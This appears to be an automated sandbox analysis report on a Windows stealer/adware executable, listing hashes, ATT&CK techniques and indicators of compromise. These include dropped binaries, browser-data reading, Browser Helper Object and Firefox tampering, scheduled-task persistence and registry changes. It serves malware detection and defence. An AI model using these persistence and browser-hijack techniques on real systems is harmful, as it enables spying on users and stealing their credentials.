a6896ef390d994a7ff4c9c07775ad15dbd207c72079a473389990d462ad81387

Analysis

max time kernel
111s
max time network
125s
platform
windows10_x64
resource
win10v20210410
submitted
21-06-2021 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67897b2c1425411173ea7054d21a93e6.exe
Size

7.0MB
MD5

67897b2c1425411173ea7054d21a93e6
SHA1

d615b097aeb4af39a4c923e7e78dc8e2eeb5b8e6
SHA256

a6896ef390d994a7ff4c9c07775ad15dbd207c72079a473389990d462ad81387
SHA512

9a064a39b536646c129a643b326bbf7a656f008cc441cee78881bceaeaf586613874100c14c4de3726d97552e3897923d49a3251d538e0533aa0b5eef742b989

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

20 3956 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeaQrcOZA.execwWqefp.exejJopyla.exe

pid process

1264 SimplInst.exe
2884 SimplInst.exe
3472 aQrcOZA.exe
3980 cwWqefp.exe
3768 jJopyla.exe

flow	pid	process
20	3956	rundll32.exe

pid	process
1264	SimplInst.exe
2884	SimplInst.exe
3472	aQrcOZA.exe
3980	cwWqefp.exe
3768	jJopyla.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3956 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

cwWqefp.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini cwWqefp.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
3956	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	cwWqefp.exe

Drops file in System32 directory 17 IoCs

Processes:

SimplInst.exerundll32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaQrcOZA.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	aQrcOZA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	aQrcOZA.exe

Drops file in Program Files directory 64 IoCs

Processes:

cwWqefp.exe

description	ioc	process
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\qDCCGhOyU\ICJrDSo.xml	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fi\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ml\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_PT\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pl\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\zh_CN\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\background.html	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\it\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ja\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ms\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\tr\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sk\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sv\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\te\messages.json	cwWqefp.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\icon16.ico	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\kn\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ro\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ru\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\QpiclYH.xml	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ko\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\tjjvRAW.dll	cwWqefp.exe
File opened for modification	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\be\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ca\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\de\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\el\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es_419\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\mO48CE.dll	cwWqefp.exe
File created	C:\Program Files (x86)\XpqoUDXlJoUn\DEAgupo.dll	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ta\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\IsCIfPyZoDbSM.dll	cwWqefp.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bg\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fa\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\id\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\nl\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hr\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lt\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sq\messages.json	cwWqefp.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\da\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_US\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fr\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\he\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\SGnysjP.dll	cwWqefp.exe
File created	C:\Program Files (x86)\piLDiRqvGTKTC\UHwHmDv.dll	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_BR\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sw\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\th\messages.json	cwWqefp.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\et\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fil\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lv\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\BgzzAiI.xml	cwWqefp.exe
File created	C:\Program Files (x86)\qDCCGhOyU\sIPZDS.dll	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_GB\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\no\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\vi\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\zYWcbzp.exe	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\cs\messages.json	cwWqefp.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\mr\messages.json	cwWqefp.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bkckNrBYOjfprwtEPo.job	schtasks.exe
File created	C:\Windows\Tasks\lJLWniCkwZbjhapzm.job	schtasks.exe
File created	C:\Windows\Tasks\pMLebdOaFqOcGSU.job	schtasks.exe
File created	C:\Windows\Tasks\bAvepIylLlkyPpwct.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2300	schtasks.exe
2980	schtasks.exe
1248	schtasks.exe
3144	schtasks.exe
3936	schtasks.exe
3152	schtasks.exe
2584	schtasks.exe
2232	schtasks.exe
1460	schtasks.exe
3884	schtasks.exe
3604	schtasks.exe
3332	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

cwWqefp.exejJopyla.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	cwWqefp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	cwWqefp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	cwWqefp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	cwWqefp.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	cwWqefp.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	jJopyla.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	cwWqefp.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions	cwWqefp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "zYWcbzp.exe"	cwWqefp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd348570bb1460e0d9402efd926768604	cwWqefp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	jJopyla.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "zYWcbzp.exe"	cwWqefp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\zYWcbzp.exe = "9999"	cwWqefp.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights	cwWqefp.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 64 IoCs

Processes:

cwWqefp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\tjjvRAW.dll"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	cwWqefp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	cwWqefp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	cwWqefp.exe
